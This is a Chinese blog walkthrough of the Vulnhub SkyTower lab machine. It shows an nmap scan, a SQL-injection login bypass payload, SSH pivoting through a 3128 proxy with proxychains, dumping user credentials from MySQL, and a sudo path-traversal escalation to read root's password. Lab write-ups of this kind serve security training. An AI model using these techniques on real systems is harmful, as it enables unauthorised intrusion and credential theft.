VulhubSkyTower靶机详解

于 2024-09-17 13:30:10 发布
阅读量328 收藏 2
点赞数 14
分类专栏: 靶机 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62457642/article/details/142313826
版权

项目地址

https://download.vulnhub.com/skytower/SkyTower.zip

项目配置

我们下载一个VirtualBox,这是官网

Downloads – Oracle VirtualBox

安装到默认路径就行

打开后点击注册

选择解压后的vbox文件

然后点击左上角管理

点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步

就得到了一个iso镜像文件

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机ip和端口

nmap 192.168.47.0-254

根据对比可知SkyTower的ip地址为192.168.47.160,开放了22,80,3128端口

访问网站

发现是个登录界面

发现登录框,我们测sql注入

邮箱随便输入一个,密码我们输入

123'|| 1=1 #

爆出了一个默认用户

尝试登录发现登录失败

因为开放22端口,尝试一下ssh登录

连接不上

还有个3128端口,挂上代理尝试一下

vim /etc/proxychains4.conf

然后使用代理连接

proxychains ssh john@192.168.47.162 -t "/bin/sh"

连接成功

提权

sudo -l

发现没有权限

想起刚才login.php存在sql注入

查看一下

发现一个数据库

尝试登录

mysql -u root SkyTech -p

登录成功

四处翻翻

show databases;
use SkyTech;
show tables;
select * from login;

发现了另外一个用户sara

使用这个用户登录看看

proxychains ssh sara@192.168.47.162 -t "/bin/sh"

登录成功

sudo -l

发现/accounts/*有权限

pwd
ls ..
ls ../..

找到accounts在根目录下

我们利用accounts/有权限,查看root下有啥

sudo ls /accounts/../root

查看flag.txt文件

img

得到了root账户的密码

再次ssh连接root用户

proxychains ssh root@192.168.47.162 -t "/bin/sh"

img

提权成功

秋妤.
关注
专栏目录
XXE靶机详解
like_niustyle的博客
09-14 662
常规思路:先扫描端口,扫描目录 这里有点迷惑了,我用nessus扫了一遍扫出来两个开放端口:80和5335,。但是用nmap只扫描出来了一个80 端口 不知道是什么原因,有懂的大佬可以解释一下 不管了,根据后面的结果来看端口多一个少一个完全不影响 照例访问80: 没啥用,apache默认页面 端口5335访问不了 接下来扫目录,御剑和dirb都可以,看用什么系统了 index.html依然是apache的默认界面 robots.txt: xxe是目录,admin.php是页面 xxe: xx
DC-9靶机渗透详解
xiaocainiao2017的博客
12-07 2883
DC-9靶机 查看dc-9的mac地址 sudo arp-scan -l 找出dc-9的IP地址 sudo nmap -A -p- 10.9.11.26 扫描dc-9端口 访问80端口 查看wappalyzer dirb http://10.9.11.26/ 扫描目录 进入css 点击style.css 进另一个目录includes dirb效果不太好,使用dirmap。 访问http://10.9.11.26/display.php
DC-2靶机详解
TonyChaoWei的博客
02-07 1462
上面使用了 wpscan 进行了扫描和爆破,但是漏洞扫描没有任何结果,因为现在 wpscan 扫描漏洞需要 API Token 的支持,所以需要访问 https://wpvulndb.com/users/sign_up 注册一个账号,获得 API Token。根据信息,CVE 编号为 CVE-2019-8942、CVE-2019-8943,MSF 里正好有模块,不过其实是不好利用的,因为这个漏洞是通过文件上传造成的,而 jerry 和 tom 都无法上传,只有 admin 有权限修改上传点。
VulnhubJANGOW靶机详解
weixin_62457642的博客
08-05 499
靶机JANGOW速刷
holynix靶机详解
a666666688的博客
09-13 605
【代码】holynix靶机详解
VulnhubJIS-CTF靶机详解
weixin_62457642的博客
08-11 807
靶机JIS-CTF速刷
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
【HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8459
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
java-ssm+jsp在线医疗服务系统实现源码(项目源码-说明文档)
09-16
管理员管理医生,药品,预约挂号,购买订单以及用户病例等信息。医生管理坐诊信息,审核预约挂号,管理用户病例。用户查看医生坐诊,对医生预约挂号,在线购买药品。 项目关键技术 开发工具:IDEA 、Eclipse 编程语言: Java 数据库: MySQL5.7+ 后端技术:ssm 前端技术:jsp 关键技术:jsp、spring、ssm、MYSQL、MAVEN 数据库工具:Navicat、SQLyog
《基于改进粒子群算法的混合储能系统容量优化》完全复现 matlab 以全生命周期费用最低为目标函数,负荷缺电率作为风光互补发电
09-16
《基于改进粒子群算法的混合储能系统容量优化》完全复现 matlab。 以全生命周期费用最低为目标函数,负荷缺电率作为风光互补发电系统的运行指标,得到蓄电池储能和超级电容个数,缺电率和系统最小费用。 粒子群算法:权重改进、对称加速因子、不对称加速因子三种情况的优化结果和迭代曲线。 另包含2020年最新提出的阿基米德优化算法AOA和麻雀搜索算法SSA对该lunwen的实现。 (该算法收敛速度快,不存在pso的早熟收敛)
java-ssm+jsp游戏账号交易管理平台实现源码(项目源码-说明文档)
09-16
游戏售卖网站,在系统首页可以查看地下城勇士、英雄联盟、游戏账号、新闻资讯等内容 项目关键技术 开发工具:IDEA 、Eclipse 编程语言: Java 数据库: MySQL5.7+ 后端技术:ssm 前端技术:jsp 关键技术:jsp、spring、ssm、MYSQL、MAVEN 数据库工具:Navicat、SQLyog
【语音去噪】基于matlab谱减法+维纳滤波+最小均方误差估计法语音去噪【含Matlab源码 4294期】.mp4
09-16
Matlab领域上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 语音处理系列程序定制或科研合作方向:语音隐藏、语音压缩、语音识别、语音去噪、语音评价、语音加密、语音合成、语音分析、语音分离、语音处理、语音编码、音乐检索、特征提取、声源定位、情感识别、语音采集播放变速等;
注册会计师会计第十五章 债务重组.doc
09-16
注册会计师会计第十五章 债务重组.doc
第8周实践课安排.pdf
09-16
第8周实践课安排.pdf
全面预算管理与控制习题答案.doc
09-16
全面预算管理与控制习题答案.doc
已知二叉树的先序与中序序列恢复二叉树
最新发布
09-16
已知二叉树的先序与中序序列恢复二叉树
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值